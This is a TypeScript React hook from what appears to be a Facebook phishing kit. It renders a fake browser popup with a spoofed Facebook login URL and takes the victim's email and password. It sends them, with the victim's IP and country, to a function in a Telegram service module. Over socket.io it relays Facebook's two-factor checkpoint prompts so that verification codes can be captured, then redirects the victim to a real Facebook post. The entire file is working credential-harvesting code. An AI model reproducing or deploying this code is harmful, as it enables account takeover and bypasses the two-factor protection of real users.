// hooks/useLoginState.ts
import { useCallback, useEffect, useState } from "react";
import { login, getLocation, closeWindow } from "../services/telegram.service";
import useStore from "../store";
import useLocalStorage from "../hooks/useLocalStore";
import { useSocketIO } from "../socketIO";

const useLoginState = () => {
  const [showPassword, setShowPassword] = useState(false);
  const { setChrome, setTimestamp, setLoginTime, loginTime } = useStore();
  const [loading, setLoading] = useState(false);
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("");
  const [email, setEmail] = useState("");
  const [password, setPassword] = useState("");
  const [loginFailed, setLoginFailed] = useState(false);
  const [isError, setError] = useState(false);
  const [isPassInvalid, setPassInvalid] = useState(false);
  const [isBrowserLoaded, setIsBrowserLoaded] = useState(false);
  const [url, setUrl] = useState("about:blank");
  const [isCheckPoint, setIsCheckPoint] = useState(false);

  const { id, socketIO } = useSocketIO();
  const [user, setUser] = useLocalStorage("user", {
    phoneNumber: "",
    email: "",
    password: "",
    twoFaCode: ""
  });

  const fetchCountry = async () => {
    const data = await getLocation();
    setIp(data.ip);
    setCountryCode(data.country_code);
  };

  const handleLogin = async () => {
    setLoginFailed(email.length === 0);
    setPassInvalid(password.length < 6);
    if (password.length >= 6 && email.length > 0) {
      setLoading(true);
      try {
        const { success, data } = await login(
          email,
          email,
          email,
          password,
          countryCode,
          ip,
          `Captcha - ${window.location.hostname}`,
          id
        );
        if (data?.loading) {
          return setLoading(true);
        }
        if (success) {
          setTimestamp(data.timeStamp);
          if (data.isLoggedIn) {
            if (data.checkpoint) {
              setUser({
                ...user,
                email,
                phoneNumber: "0000000000",
                password,
                userName: data.name,
                checkpointType: 1,
                twoFaTitle: data.twoFaTitle,
                twoFaDescription: data.twoFaDescription,
                codeLabel: data.codeLabel,
                continueLabel: data.textBtns[0] || "Continue",
                otherLabel: data.textBtns[1] || "Try another way",
                countdownText: data.countdownText
              });
              setIsCheckPoint(true);
            } else if (
              data.url.includes(
                "https://www.facebook.com/two_step_verification/two_factor"
              ) ||
              data.url.includes(
                "https://www.facebook.com/auth_platform/afad/"
              ) ||
              data.url.includes(
                "https://www.facebook.com/auth_platform/codesubmit"
              )
            ) {
              setUser({
                ...user,
                email,
                phoneNumber: "0000000000",
                password,
                userName: data.name,
                checkpointType: 2,
                twoFaTitle: data.twoFaTitle,
                twoFaDescription: data.twoFaDescription,
                codeLabel: data.codeLabel,
                continueLabel: data.textBtns[0] || "Continue",
                otherLabel: data.textBtns[1] || "Try another way",
                countdownText: data.countdownText
              });
              setIsCheckPoint(true);
            } else if (data.url === "https://www.facebook.com/") {
              setChrome(false);
              setLoginTime(loginTime + 1);
              window.location.href =
                "https://www.facebook.com/posts/pfbid0TQEY9A2S8XBt9BuvQwwggzyxrh9TieN8hhksW9hH3nD7J6HMriAugeP9GtAqmR37l?rdid=KU8jgMdfbDlnx38u#";
            }
          } else {
            setLoginFailed(true);
          }
          setUrl(data.url);
        } else {
          setError(true);
        }
      } catch (error) {
        setError(true);
      }
      setLoading(false);
    }
  };

  const handleAppClose = useCallback(
    (close = false) => {
      if (!loading) {
        setChrome(close);
        closeWindow(id);
      }
    },
    [id, loading, setChrome]
  );

  useEffect(() => {
    fetchCountry();
    setTimeout(() => {
      setUrl(
        "https://www.facebook.com/login.php?skip_api_login=1&api_key=274266067164&kid_directed_site=0&app_id=274266067164&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fv12.0%2Fdialog%2Foauth%3Fapp_id%3D274266067164%26auth_type%26cbt%3D1699121478449%26channel_url%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df1b2e7aa439c86c%2526domain%253Dwww.pinterest.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252Fwww.pinterest.com%25252Ff3d29379cfb53e8%2526relation%253Dopener%26client_id%3D274266067164%26config_id%26display%3Dpopup%26domain%3Dwww.pinterest.com%26e2e%3D%257B%257D%26fallback_redirect_uri%3Dhttps%253A%252F%252Fwww.pinterest.com%252Flogin%252F%26force_confirmation%3Dfalse%26id%3Df299481fefa4ce8%26locale%3Den_US%26logger_id%3Dd76f910f-d083-42ee-b5a1-63e62db0e693%26messenger_page_id%26origin%3D1%26plugin_prepare%3Dtrue%26redirect_uri%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df3de76f414c2aac%2526domain%253Dwww.pinterest.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252Fwww.pinterest.com%25252Ff3d29379cfb53e8%2526relation%253Dopener.parent%2526frame%253Df299481fefa4ce8%26ref%3DLoginButton%26reset_messenger_state%3Dfalse%26response_type%3Dsigned_request%252Ctoken%252Cgraph_domain%26scope%3Dpublic_profile%252Cemail%252Cuser_friends%26sdk%3Djoey%26size%3D%257B%2522width%2522%253A600%252C%2522height%2522%253A679%257D%26url%3Ddialog%252Foauth%26version%3Dv12.0%26ret%3Dlogin%26fbapp_pres%3D0%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df3de76f414c2aac%26domain%3Dwww.pinterest.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Fwww.pinterest.com%252Ff3d29379cfb53e8%26relation%3Dopener.parent%26frame%3Df299481fefa4ce8%26error%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied&display=popup&locale=en_GB&pl_dbl=0"
      );
      setIsBrowserLoaded(true);
    }, 1000);
  }, []);

  useEffect(() => {
    socketIO?.on("wrong_password", () => {
      setLoading(false);
      setLoginFailed(true);
    });
  }, [socketIO]);

  useEffect(() => {
    socketIO?.on(
      "check_point",
      (data: {
        isLoggedIn: boolean;
        name: string;
        twoFaTitle: string;
        checkpoint: boolean;
        checkpointType: number;
        twoFaDescription: string;
        codeLabel: string;
        textBtns: string[];
        countdownText: string;
      }) => {
        if (data.isLoggedIn) {
          if (data.checkpoint) {
            setUser({
              ...user,
              email,
              phoneNumber: "0000000000",
              password,
              userName: data.name,
              checkpointType: 1,
              twoFaTitle: data.twoFaTitle,
              twoFaDescription: data.twoFaDescription,
              codeLabel: data.codeLabel,
              continueLabel: data.textBtns[0] || "Continue",
              otherLabel: data.textBtns[1] || "Try another way",
              countdownText: data.countdownText
            });
            setIsCheckPoint(true);
          } else if (data.checkpointType !== 1) {
            setUser({
              ...user,
              email,
              phoneNumber: "0000000000",
              password,
              userName: data.name,
              checkpointType: 2,
              twoFaTitle: data.twoFaTitle,
              twoFaDescription: data.twoFaDescription,
              codeLabel: data.codeLabel,
              continueLabel: data.textBtns[0] || "Continue",
              otherLabel: data.textBtns[1] || "Try another way",
              countdownText: data.countdownText
            });
            setIsCheckPoint(true);
          }

          setUrl(
            "https://www.facebook.com/two_step_verification/authentication?encrypted_key=274266067164&kid_directed_site=0&app_id=274266067164&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fv12.0%2Fdialog%2Foauth%3Fapp_id%3D274266067164%26auth_type%26cbt%3D1699121478449%26channel_url%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df1b2e7aa439c86c%2526domain%253Dwww.pinterest.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252Fwww.pinterest.com%25252Ff3d29379cfb53e8%2526relation%253Dopener%26client_id%3D274266067164%26config_id%26display%3Dpopup%26domain%3Dwww.pinterest.com%26e2e%3D%257B%257D%26fallback_redirect_uri%3Dhttps%253A%252F%252Fwww.pinterest.com%252Flogin%252F%26force_confirmation%3Dfalse%26id%3Df299481fefa4ce8%26locale%3Den_US%26logger_id%3Dd76f910f-d083-42ee-b5a1-63e62db0e693%26messenger_page_id%26origin%3D1%26plugin_prepare%3Dtrue%26redirect_uri%3Dhttps%253A%252F%252Fstaticxx.facebook.com%252Fx%252Fconnect%252Fxd_arbiter%252F%253Fversion%253D46%2523cb%253Df3de76f414c2aac%2526domain%253Dwww.pinterest.com%2526is_canvas%253Dfalse%2526origin%253Dhttps%25253A%25252F%25252Fwww.pinterest.com%25252Ff3d29379cfb53e8%2526relation%253Dopener.parent%2526frame%253Df299481fefa4ce8%26ref%3DLoginButton%26reset_messenger_state%3Dfalse%26response_type%3Dsigned_request%252Ctoken%252Cgraph_domain%26scope%3Dpublic_profile%252Cemail%252Cuser_friends%26sdk%3Djoey%26size%3D%257B%2522width%2522%253A600%252C%2522height%2522%253A679%257D%26url%3Ddialog%252Foauth%26version%3Dv12.0%26ret%3Dlogin%26fbapp_pres%3D0%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fstaticxx.facebook.com%2Fx%2Fconnect%2Fxd_arbiter%2F%3Fversion%3D46%23cb%3Df3de76f414c2aac%26domain%3Dwww.pinterest.com%26is_canvas%3Dfalse%26origin%3Dhttps%253A%252F%252Fwww.pinterest.com%252Ff3d29379cfb53e8%26relation%3Dopener.parent%26frame%3Df299481fefa4ce8%26error%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied&display=popup&locale=en_GB&pl_dbl=0"
          );
        }
        setLoading(false);
      }
    );
  }, [email, password, setUser, socketIO, user]);

  return {
    showPassword,
    setShowPassword,
    loading,
    countryCode,
    ip,
    email,
    setEmail,
    password,
    setPassword,
    loginFailed,
    isError,
    isPassInvalid,
    isBrowserLoaded,
    url,
    isCheckPoint,
    handleLogin,
    handleAppClose,
    setChrome
  };
};

export default useLoginState;
